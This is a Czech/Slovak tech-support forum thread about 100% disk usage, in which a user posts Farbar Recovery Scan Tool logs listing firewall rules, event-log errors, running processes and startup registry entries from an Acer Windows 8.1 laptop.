FirewallRules: [{A62EF2BA-578B-4FEB-89A9-85EEFE742466}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{2817DD9A-31A9-420A-A06F-377D4B8323DB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe => No File
FirewallRules: [{3DA36FEE-2FBA-413E-989B-98AECE1AEBD8}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe => No File
FirewallRules: [{50D0DF4A-5879-49FC-A537-09FC294AA9AB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe => No File
FirewallRules: [{572561E4-22C8-4C64-9485-0719E890D8B8}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{51DEC5F2-CD66-4C7A-A1BE-8AE5D960A19A}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{92D1320A-03E7-40B0-B28C-041AB4188B8D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{F5D62F46-FA0F-4DAF-B4E5-DBB3A65AEF08}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{AE3E6DAF-7213-447F-8C5C-31AECE94AEAC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{CB8413FA-6C62-4A93-8C5C-8765FBA9868F}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{15687744-C365-443B-809C-2E07CA7237F0}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{4861CB37-C9F1-4F57-BCCC-A0C61836DB64}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{2548F8BD-3A37-4010-A432-C4F0FAACCFDF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{3DCDB0AE-E13F-4C6E-9529-BE92F3DE06CA}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{4B1B521D-AF14-487A-9691-BADF2DAF9801}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe (Acer Incorporated -> Acer Cloud Technology)
FirewallRules: [{867C3876-78D7-438D-9890-19E2A095B5C7}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe (Acer Incorporated -> Acer Cloud Technology)
FirewallRules: [{C1251D42-8BD7-4D88-80FC-8A854ACE4773}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{7C1D507D-B367-4F42-BB06-AA4F37F15B87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{B1299264-DDCE-41E6-A3C4-E7B0FD2F0ED9}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{C882961D-EE29-438E-A223-1DA143AC658A}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{54020B62-5B98-4007-8BAA-A6E864B0B055}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe (Acer Incorporated -> acer)
FirewallRules: [{8C9688D2-BEDC-4543-9F40-4BD65ABB82BA}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe (Acer Incorporated -> acer)
FirewallRules: [{6D22E79A-BDC3-4BDE-A9F0-4BE56F96364A}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{F0DF8F88-F4CA-4AAD-A8EA-3D27EEFE42DA}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{6D6D16CB-40F8-4D75-A1A2-7030DA42014A}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{12FB08E4-31A5-41A1-A8B9-CF654892046F}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{D42F0320-F9D7-438C-8245-E15CDA9E1216}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{6676047C-AB6F-4341-BBC0-81EB72CC8EC9}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{AB97008D-8450-43C9-B4BD-BAD23F4A3F28}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{74E0E064-22FA-4C58-932E-4D328F6D562D}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{50EE536B-470A-46D3-8F31-1B27139C9218}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Wireless Connectivity Solutions -> )
FirewallRules: [TCP Query User{767EA69D-F320-4789-9F53-5F1518488AE8}C:\windows\system32\settingsynchost.exe] => (Block) C:\windows\system32\settingsynchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{270674B8-AA4F-4079-81CB-399CFA46182E}C:\windows\system32\settingsynchost.exe] => (Block) C:\windows\system32\settingsynchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{AA0C193C-69EB-4D03-8BFA-94A8492CF609}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{14FD40CF-E823-4614-BBE3-1BADFF5D0175}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{B8E57550-FE49-414F-868D-91C9D1AE3030}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{1FF74572-003F-4E86-848E-3EB272B971DC}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{BBC9DC66-3018-4526-AE56-3AB640DE1DCD}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{8A0E73AF-3E0E-4490-BA2B-7DF3AC4818F1}] => (Allow) C:\Program Files (x86)\Acer\abMusic\DMCDaemon.exe (Acer Incorporated -> acer)
FirewallRules: [{DB855391-EC02-4761-BF28-6F3CB3A1A4EA}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{71ED5305-A9C1-4A48-817D-3F4FEB59CB8D}] => (Allow) C:\Program Files (x86)\Acer\abMusic\WindowsUpnpMV.exe (Acer Incorporated -> acer)
FirewallRules: [{5BA545F1-4951-4E9C-AE94-7E5477BDEFFA}] => (Allow) C:\Windows\system32\config\systemprofile\AppData\Local\Chromium\Application\chrome.exe => No File
FirewallRules: [{4BBE5CCE-9769-4F29-9294-84190D3D1DAE}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EA351B0B-BE40-4F23-BA0B-582AFA7FE714}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{408ECB4C-F8E7-4806-BDE0-E5789A51E9CA}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{B3BC7554-D8D2-450E-8BCB-BAF4BCBCD2F2}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{DA6198FE-8132-4491-A747-443799B2DD80}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{66E84AD2-5BBE-48AA-B434-C92782A98AFD}] => (Allow) C:\Program Files (x86)\Apowersoft\Apowersoft Screen Capture Pro\Apowersoft Screen Capture Pro.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{3DE22AC2-0ADC-4195-8E7E-1D3491EC702F}] => (Allow) C:\Program Files (x86)\Apowersoft\Apowersoft Screen Capture Pro\Apowersoft Screen Capture Pro.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{0D2B18B3-6065-466C-9D27-A708DF0FE5A7}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7DC2AC63-8024-47C2-85B6-DF022DC5D200}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9C746978-8667-4FD2-B45E-2757F0B145E7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{68B7C136-8579-4AEE-A4FC-095CB0E9F142}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{50CEC269-2087-467B-8DA9-A9D0F6E80262}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{4A969FDB-7981-46CB-AC67-AA8E8DFF6952}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{579AD384-EC00-4DF8-98C9-AAB405AE5260}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{43C9BD67-EEDF-446C-8BE2-E07B5C54EB4B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{9E1BD565-01CD-4CBB-B5A1-7D3EF2F3156C}] => (Allow) C:\Users\Alžbeta\AppData\Local\Apowersoft\Apowersoft Online Launcher\Apowersoft Online Launcher.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{8877B2C9-9B8F-4AE3-91E4-B58EC413EFFD}] => (Allow) C:\Users\Alžbeta\AppData\Local\Apowersoft\Apowersoft Online Launcher\Apowersoft Online Launcher.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{17DB4F52-8DFA-4292-B7BE-CEE39F2FA870}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BE93C6D0-7224-42B5-AED1-70833879FF02}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{6D3F89D6-DDD3-4063-BDBA-ED81102C5502}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{AE1AFD09-283F-4BBB-B0F9-53E687B1CDD5}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{37896B31-59F3-45F9-98F2-B14A7D34A73D}] => (Allow) C:\Users\Alžbeta\AppData\Local\Programs\Opera\74.0.3911.203\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{30160DB6-A2F9-4FB9-8F54-DC9ED765BF74}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C5EA33C3-3CDF-447E-8E68-42C25274B0D8}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3DD00F3D-977D-4E17-A46E-727E4F7AA617}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{17F4CD8A-2C5B-4867-B686-BDF99F643DAF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{2A65DA94-C0F8-44EA-8EA7-C2720A0C88B4}] => (Allow) C:\Users\Alžbeta\AppData\Local\Programs\Opera\74.0.3911.218\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{DDD820B7-9B88-4F0F-BBD8-0CFE670461E0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{23C0E00A-D285-44D9-9A15-EF31FB45F4CD}] => (Allow) C:\Users\Alžbeta\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{63F4D787-3106-4A04-8B8D-5A2755FB01FC}] => (Allow) C:\Users\Alžbeta\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{BB37EA80-FC62-4E5B-B932-3806691F7E30}] => (Allow) C:\Users\Alžbeta\AppData\Roaming\Zoom\bin\airhost.exe => No File

==================== Restore Points =========================

08-03-2021 12:40:56 Windows Update
15-03-2021 10:46:46 Windows Update
24-03-2021 13:31:24 Scheduled Checkpoint
29-03-2021 13:28:50 AdwCleaner_BeforeCleaning_29/03/2021_13:28:47
30-03-2021 11:34:52 AdwCleaner_BeforeCleaning_30/03/2021_11:34:44

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (03/30/2021 10:42:42 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: A problem prevented Customer Experience Improvement Program data from being sent to Microsoft, (Error 80070005).

Error: (03/30/2021 10:04:23 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (03/29/2021 02:53:35 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7750

Error: (03/29/2021 02:53:35 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7750

Error: (03/29/2021 02:53:35 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/29/2021 01:25:37 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 28.3.2021.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 18b2c

Start Time: 01d7248c0529b61e

Termination Time: 4294967295

Application Path: C:\install\FRST64.exe

Report Id: 6d1d3d5d-9081-11eb-82ca-2c600c36c058

Faulting package full name:

Faulting package-relative application ID:

Error: (03/29/2021 01:03:02 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program OUTLOOK.EXE version 15.0.5327.1000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2090

Start Time: 01d7247dd11e4b1f

Termination Time: 1207

Application Path: C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE

Report Id: 3bce6823-907e-11eb-82ca-2c600c36c058

Faulting package full name:

Faulting package-relative application ID:

Error: (03/29/2021 12:22:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Názov chybujúcej aplikácie: Teams.exe, verzia: 1.4.0.4167, časová značka: 0x5e9f0152
Názov chybujúceho modulu: ntdll.dll, verzia: 6.3.9600.19678, časová značka: 0x5e82c88a
Kód výnimky: 0xc0000005
Odstup chyby: 0x00000000000547eb
Identifikácia chybujúceho procesu: 0x4c6c
Čas spustenia chybujúcej aplikácie: 0x01d724826177e10b
Cesta chybujúcej aplikácie: C:\Users\Alžbeta\AppData\Local\Microsoft\Teams\current\Teams.exe
Cesta chybujúceho modulu: C:\Windows\SYSTEM32\ntdll.dll
Identifikácia hlásenia: 9c0998c7-9078-11eb-82ca-2c600c36c058
Celé meno chybujúceho balíka:
Identifikácia chybujúcej aplikácie vzhľadom na balík:


System errors:
=============
Error: (03/30/2021 11:46:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby GamesAppIntegrationService zlyhalo kvôli nasledujúcej chybe:
Systém nemôže nájsť zadaný súbor.

Error: (03/30/2021 11:46:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Služba Microsoft Edge Update (edgeupdate) zlyhalo kvôli nasledujúcej chybe:
Služba neodpovedala na riadiaci alebo spúšťací pokyn načas.

Error: (03/30/2021 11:46:53 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Počas čakania na pripojenie služby Služba Microsoft Edge Update (edgeupdate) bol dosiahnutý časový limit (30000 ms).

Error: (03/30/2021 11:45:43 AM) (Source: DCOM) (EventID: 10010) (User: ALZBETA)
Description: The server {4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474} did not register with DCOM within the required timeout.

Error: (03/30/2021 11:44:36 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Počas čakania na pripojenie služby Windows Error Reporting Service bol dosiahnutý časový limit (30000 ms).

Error: (03/30/2021 11:40:22 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll

Error: (03/30/2021 11:40:22 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll

Error: (03/30/2021 11:39:58 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll


Windows Defender:
================
Date: 2017-12-06 14:06:17.693
Description:
Windows Defender scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2017-12-01 19:27:40.105
Description:
Windows Defender scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2017-12-01 17:56:33.587
Description:
Windows Defender scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2017-12-01 17:31:49.342
Description:
Windows Defender scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2017-11-28 17:41:04.399
Description:
Windows Defender scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2017-11-22 17:16:11.280
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.257.713.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.14306.0
Error code: 0x80070652
Error description: Práve prebieha iná inštalácia. Pred spustením novej inštalácie je nutné danú inštaláciu dokončiť.

Date: 2017-11-22 17:16:11.280
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.257.713.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.14306.0
Error code: 0x80070652
Error description: Práve prebieha iná inštalácia. Pred spustením novej inštalácie je nutné danú inštaláciu dokončiť.

Date: 2017-11-22 17:16:03.857
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version:
Update Source: User
Signature Type:
Update Type:
Current Engine Version:
Previous Engine Version:
Error code: 0x80070652
Error description: Práve prebieha iná inštalácia. Pred spustením novej inštalácie je nutné danú inštaláciu dokončiť.

Date: 2017-11-22 17:16:03.666
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version:
Update Source: User
Signature Type:
Update Type:
Current Engine Version:
Previous Engine Version:
Error code: 0x80070652
Error description: Práve prebieha iná inštalácia. Pred spustením novej inštalácie je nutné danú inštaláciu dokončiť.

Date: 2017-11-22 17:15:03.653
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version: 1.257.713.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.14306.0
Error code: 0x80240016
Error description: Počas vyhľadávania aktualizácií sa vyskytol neočakávaný problém. Informácie o inštalácii aktualizácií a riešení problémov s aktualizáciami nájdete v Pomoci a technickej podpore.

==================== Memory info ===========================

BIOS: Insyde Corp. V1.21 09/24/2014
Motherboard: Acer EA40_HB
Processor: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 60%
Total physical RAM: 4019.27 MB
Available physical RAM: 1569.25 MB
Total Virtual: 5043.27 MB
Available Virtual: 2888.16 MB

==================== Drives ================================

Drive c: (Acer) (Fixed) (Total:446.57 GB) (Free:304.23 GB) NTFS

\\?\Volume{461f93d3-52c8-4da4-a637-334ecaeb5826}\ (Recovery) (Fixed) (Total:0.59 GB) (Free:0.3 GB) NTFS
\\?\Volume{23688fd9-e3ec-41da-8316-8e4b76c06903}\ (Push Button Reset) (Fixed) (Total:18.18 GB) (Free:3.47 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: E793D512)

Partition: GPT.

==================== End of Addition.txt =======================

alfonz.flower
Návštěvník
Návštěvník
Příspěvky: 71
Registrován: 20 říj 2019 16:46

Re: Disk 100%

#6 Příspěvek od alfonz.flower »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-03-2021
Ran by Alžbeta (administrator) on ALZBETA (Acer Aspire E5-471) (30-03-2021 11:49:57)
Running from C:\install
Loaded Profiles: Alžbeta
Platform: Windows 8.1 (Update) (X64) Language: Slovenčina (Slovensko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Windows\SysWOW64\UMonit64.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMLockHandler.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
(Acer Incorporated -> Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
(CyberLink -> ) C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\eguiProxy.exe
(ESET, spol. s r.o. -> ESET) C:\Program Files\ESET\ESET Security\ekrn.exe
(Fortemedia Inc -> ) C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <8>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.72\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.72\GoogleCrashHandler64.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxTray.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Kerio Technologies, Inc. -> Kerio Technologies Inc.) C:\MailServer\mailserver.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\browserhost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\WinStore\WSHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.19750_none_fa39f32f9b2d0928\TiWorker.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(philandro Software GmbH -> philandro Software GmbH) C:\Users\Alžbeta\Downloads\support.exe <4>
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SEIKO EPSON Corporation -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7825720 2014-03-26] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13672304 2014-03-21] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => "C:\Program Files\AVAST Software\Avast\AvLaunch.exe" /gui
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Security\ecmds.exe [175504 2020-10-29] (ESET, spol. s r.o. -> ESET)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [Opera Browser Assistant] => C:\Users\Alžbeta\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [2312792 2019-06-05] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91016584 2021-01-15] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
